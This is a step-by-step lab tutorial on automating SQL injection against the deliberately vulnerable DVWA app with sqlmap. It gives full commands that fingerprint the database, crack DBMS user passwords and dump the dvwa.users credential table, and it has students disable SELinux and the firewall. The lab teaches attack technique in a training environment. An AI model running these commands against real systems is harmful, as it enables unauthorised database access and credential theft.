Hướng Dẫn Thực Hành - Automate SQL Injection with SqlMap (DVWA): Lesson 7

---

Section 0. Background Information

• What is Damn Vulnerable Web App (DVWA)?
  • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
  • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
• What is sqlmap?
  • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
• Pre-Requisite Labs
  • Damn Vulnerable Web App (DVWA): Lesson 1: How to Install DVWA in Fedora 14
  • Damn Vulnerable Web App (DVWA): Lesson 4: Using Metasploit with Command Execution (Required)
  • Damn Vulnerable Web App (DVWA): Lesson 5: Using Tamper Data with crack_web_form.pl
  • Damn Vulnerable Web App (DVWA): Lesson 6: Manual SQL Injection, John the Ripper

• References
  • http://sqlmap.sourceforge.net/doc/README.html#s1
• Lab Notes
  • In this lab we will do the following:
    1. We will use sqlmap to obtain the following pieces of information:
       1. A list of Database Management Usernames and Passwords.
       2. A list of databases
       3. A list of tables for a specified database
       4. A list of users and passwords for a specified database table.

• Legal Disclaimer
    Tài liệu dùng cho mục đích học tập.

Section 1. Configure Fedora14 Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit BackTrack Virtual Machine Settings
   • Instructions:
     1. Highlight fedora14
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
• Instructions:
  1. Highlight Network Adapter
  2. Select Bridged
  3. Click on the OK Button.
• 

Section 2. Login to Fedora14

1. Start Fedora14 VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select Fedora14
     3. Play virtual machine
   • 
2. Login to Fedora14
   • Instructions:
     1. Login: student
     2. Password: <whatever you set it to>.
   • 

Section 3. Open Console Terminal and Retrieve IP Address

1. Start a Terminal Console
   • Instructions:
     1. Applications --> Terminal
   • 
2. Switch user to root
   • Instructions:
     1. su - root
     2. <Whatever you set the root password to>
   • 
3. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes:
     • As indicated below, my IP address is 192.168.1.106.
     • Please record your IP address.
   • 

Section 4. Temporarily Disable SELINUX and Firewall

1. Start a Terminal Console
   • Instructions:
     1. sestatus
     2. If SELinux status: is set to disabled OR if Current mode: is set to permissive, then skip the next steps, and Continue to the Next Section.
     3. If SELinux status: is set to enabled AND if Current mode: is set to enforcing, then Continue the next steps.
   • Notes:
     • In my case, I need to temporarily put selinux in permissive mode to demonstrate basic attacks on DVWA.
   • 
2. Place selinux in permissive mode
   • Instructions:
     1. echo 0 > /selinux/enforce
        • Placing a "0" in the enforce file, puts selinux in permissive mode.
     2. sestatus
        • Notice that "Current mode:" changed to permissive.
   • 
3. Disable Firewall
   • Instructions:
     1. service iptables save
        • This is not really necessary, unless you have made recent changes to the firewall.
     2. service iptables stop
        • This command disables the firewall.
   • 

Section 5. Configure BackTrack Virtual Machine Settings

1. Open Your VMware Player
   • Instructions:
     1. On Your Host Computer, Go To
     2. Start --> All Program --> VMWare --> VMWare Player
2. Edit BackTrack Virtual Machine Settings
   • Instructions:
     1. Highlight BackTrack5R1
     2. Click Edit virtual machine settings
   • 
3. Edit Network Adapter
   • Instructions:
     1. Highlight Network Adapter
     2. Select Bridged
     3. Do not Click on the OK Button.
   • 

Section 6. Login to BackTrack

1. Start BackTrack VM Instance
   • Instructions:
     1. Start Up VMWare Player
     2. Select BackTrack5R1
     3. Play virtual machine
   • 
2. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
3. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 

Section 7. Open Console Terminal and Retrieve IP Address

1. Open a console terminal
   • Instructions:
     1. Click on the console terminal
   • 
2. Get IP Address
   • Instructions:
     1. ifconfig -a
   • Notes:
     • As indicated below, my IP address is 192.168.1.105.
     • Please record your IP address.
   • 

Section 8. Login to DVWA

1. Start Firefox
   • Instructions:
     1. Click on Firefox
   • 
2. Login to DVWA
   • Instructions:
     1. Start up Firefox on BackTrack
     2. Place http://192.168.1.106/dvwa/login.php in the address bar.
        • Replace 192.168.1.106 with Fedora's IP address obtained in (Section 3, Step 3).
     3. Login: admin
     4. Password: password
     5. Click on Login
   • 

Section 9. Set Security Level

1. Set DVWA Security Level
   • Instructions:
     1. Click on DVWA Security, in the left hand menu.
     2. Select "low"
     3. Click Submit
   • 

Section 10. Obtain PHP Cookie

1. SQL Injection Menu
   • Instructions:
     1. Select "SQL Injection" from the left navigation menu.
   • 
2. Select Tamper Data
   • Instructions:
     1. Tools --> Tamper Data
   • 
3. Start Tamper Data
   • Instructions:
     1. Click on Start Tamper
   • 
4. Basic Injection
   • Instructions:
     1. Input "1" into the text box.
     2. Click Submit.
   • Note:
     • The goal here is see the GET request being made to the CGI program behind the scenes.
     • Also, we will use the "Surname" output with SQLMAP to obtain database username and password contents.
   • 
5. Tamper with request?
   • Instructions:
     1. Make sure the Continue Tampering? textbox is unchecked.
     2. Then Click Submit
   • 
6. Copying the Referer URL
   • Instructions:
     1. Select the second GET Request
     2. Right Click on the Referer Link
     3. Select Copy
   • 
7. Open Notepad
   • Instructions:
     1. Applications --> Wine --> Programs --> Accessories --> Notepad
   • 
8. Paste Referer URL into Notepad
   • Instructions:
     1. Edit --> Paste
   • 
9. Copying the Cookie Information
   • Instructions:
     1. Right Click on the Cookie line
     2. Select Copy
   • 
10. Pasting the Cookie Information
    • Instructions:
      1. Edit --> Paste
    • Notes:
      • Now you should have copied both the Referer and Cookie lines into Notepad. (See Picture)
    • 

Section 11. Using SqlMap to Obtain Current User and Database

1. Verify sqlmap.py exists
   • Instructions:
     1. cd /pentest/database/sqlmap
     2. ls -l sqlmap.py
   • 
2. Obtain Database User For DVWA
   • Note:
     1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
     2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -b, Retrieve DBMS banner
        • --current-db, Retrieve DBMS current database
        • --current-user, Retrieve DBMS current user
   • 
3. Do you want to keep testing?
   • Instructions:
     1. keep testing? y
     2. skip payloads? y
   • 
4. Viewing Results
   • Instructions:
     1. For the web application DVWA, the database name is "dvwa" and the programs that communicate with the database is "root@localhost";
   • 

Section 12. Using SqlMap to Obtain Database Management Username and Password

• NOTE: You must have completed Lesson 4 to see the db_hacker in Step 2.

1. Obtain Database Management Username and Password
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --string="Surname" --users --password
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -string, Provide a string set that is always present after valid or invalid query.
        • --users, list database management system users
        • --password, list database management password for system users.
   • 
2. Obtain Database Management Username and Password (Part 2)
   • Instructions:
     1. Use Dictionary Attack? Y
     2. Dictionary Location? <Press Enter>
   • Notes:
     1. Notice the password for username db_hacker was cracked.
   • 
3. Obtain db_hacker Database Privileges
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -U db_hacker --privileges
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -U, Specify database management user
        • --privileges, list database management system user's privileges
   • 
4. View Results: Obtain db_hacker Database Privileges
   • Instructions:
     1. Notice that DBMS user "db_hacker" has administrative privileges
     2. Notice that "db_hacker" can log in from anywhere, via the "%" wildcard operator.
   • 

Section 13. Obtain a list of all Databases

1. Obtain a list of all databases
   • Note:
     1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
     2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" --dbs
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • --dbs, List database management system's databases.
   • 
2. Review Results: Obtain a list of all databases
   • Note:
     1. Notice that sqlmap supplies a list of available databases.
   • 

Section 14. Obtain "dvwa" tables and contents

1. Obtain "dvwa" tables and contents
   • Note:
     1. Obtain the referer link from (Section 10, Step 10), which is placed after the "-u" flag below.
     2. Obtain the cookie line from (Section 10, Step 10), which is placed after the "--cookie" flag below.
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa --tables
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • --tables, List Database Tables
   • 
2. Viewing "dvwa" tables and content results
   • Note:
     1. Notice sqlmap listed two tables: guestbook and users.
   • 
3. Obtain columns for table dvwa.users
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users --columns
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -T, Specify the Database Table
        • --columns, List the Columns of the Database Table.
   • 
4. Viewing Results: columns for table dvwa.users
   • Note:
     1. Notice that there are both a user and password columns in the dvwa.users table.
   • 
5. Obtain Users and their Passwords from table dvwa.users (Part 1)
   • Instructions:
     1. ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -D dvwa -T users -C user,password --dump
        • -u, Target URL
        • --cookie, HTTP Cookie header
        • -D, Specify Database
        • -C, List user and password columns
        • --dump, Dump table contents
   • 
6. Obtain Users and their Passwords from table dvwa.users (Part 2)
   • Instructions:
     1. Do you want to use the LIKE operator? Y
     2. Recognize possible HASH values? Y
     3. What's the dictionary location? <Press Enter>
     4. Use common password suffixes? y
   • 
7. Review Results: Users and their Passwords from table dvwa.users
   • Notes:
     1. Notice how sqlmap nicely displays passwords for each user.
   • 

Section 15. Proof of Lab Using John the Ripper

1. Proof of Lab
   • Instructions:
     1. Bring up a new terminal, see (Section 7, Step 1)
     2. cd /pentest/database/sqlmap
     3. find output/* -print | xargs ls -l
     4. date
     5. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
   • Proof of Lab Instructions:
     1. Do a <PrtScn>
     2. Paste into a word document
     3. Email 2 CSIRT247@Gmail.Com
   •